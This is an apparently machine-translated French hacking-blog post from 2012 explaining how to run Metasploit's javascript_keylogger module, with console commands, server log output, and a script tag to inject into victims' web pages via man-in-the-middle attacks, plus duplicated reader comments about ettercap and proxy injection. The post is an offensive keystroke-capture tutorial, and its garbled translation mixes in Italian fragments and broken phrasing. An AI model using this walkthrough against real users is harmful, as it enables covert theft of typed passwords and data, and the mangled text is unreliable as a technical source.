ClsHack:Computer Security Blog    

[Metasploit] style de toile <=" width: 85px; hauteur: 28px; top:-4px; gauche: 1px- :D

Posté le: 5 Février 2012

Il’ vient d'être ajouté à Metasploit la forme:
javascript_keylogger

Ce module est très utile lors d'une MITM ou après l'entrée un des sites de.

Voyons comment utiliser :D

Ok, maintenant nous pouvons procéder :D
Nous mettons à jour Metasploit:
sudo msfupdate

Avviamo Metasploit:
sudo msfconsole

Laissez la forme:
search javascript keylogger

Utiliser:
auxiliary/server/capture/javascript_keylogger

Maintenant, nous allons voir les options:
show options

Une fois que nous commençons le serveur configuré :)
D'abord n'oubliez pas d'arrêter n'importe quel serveur apache / web sur le port 80:
sudo service apache2 stop

et exécuter digitiamo:
[*] Starting keylogger. Please press [CTRl]+[C] if you wish to terminate.
[*] Using URL: http://192.168.1.190:80/
[*] Server started.
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /metasploit
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js
[*] 192.168.1.190 - [05/Feb/2012:09:41:06 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js

Eh bien maintenant, nous avons maintenant de nombreuses façons d'injecter du code JavaScript dans les pages Web qui génère:
<script type="text/javascript" src="http://192.168.1.190:80/jstOfpzuCWLJsM.js"></script>

Je suggère ce qui suit :D
[RUBY]Proxy transparent && Injecter du code HTML / JAVASCRIPT

Ou nous pouvons utiliser paros proxy ou ZEP :)

Arp poisoning avec Scapy et demande Web falsifiés avec proxy paros sur Backbox

Related posts:

  1. [Metasploit] Comment faire pour ajouter module instable :)
  2. CVE-2010-3765: Mozilla Firefox à distance du module de code pour Metasploit Excution
  3. XSS: PLUS DE PUISSANCE AVEC boeuf et Metasploit
  4. [How-To]Metasploit && XSSF – Cross-Site Scripting Framework v.2.1
  5. [CVE-2010-2568]Metasploit:fenêtres Exuction Oday de code à distance

Cette entrée a été posté le Dimanche, 5 février, 2012 à 9:56 am et est classé dans GNU / Linux, Piratage, Logiciel. Vous pouvez suivre les réponses à cette entrée à travers le RSS 2.0 nourrir. Vous pouvez laisser une réponse, ou trackback à partir de votre propre site.

Tagged avec:
  • Ténébreux Viper

    très intéressant… m ho un problème.
    Qu'est-ce que je fais est d'utiliser ettercap pour un MITM, mais alors je ne sais pas comment utiliser un proxy transparent comme celui recommandé par vous.

  • ShadowyViper

    très intéressant… m ho un problème.
    Qu'est-ce que je fais est d'utiliser ettercap pour un MITM, mais alors je ne sais pas comment utiliser un proxy transparent comme celui recommandé par vous.

  • Anonyme

    Regardez les liens que j'ai posté dans l'article et des articles connexes :D

  • ClsHackBlog

    Regardez les liens que j'ai posté dans l'article et des articles connexes :D

  • http://twitter.com / SocketReve Luc Reverberi

    Intéressant…J'ai fait la même chose avec Scapy et le mode proxy nginx et le sub_filter règle pour l'injection javascript, mais je pense que c'est tellement mieux! :D (<3 Metasploit <3)

  • http://twitter.com / SocketReve Luc Reverberi

    Intéressant…J'ai fait la même chose avec Scapy et le mode proxy nginx et le sub_filter règle pour l'injection javascript, mais je pense que c'est tellement mieux! :D (<3 Metasploit <3)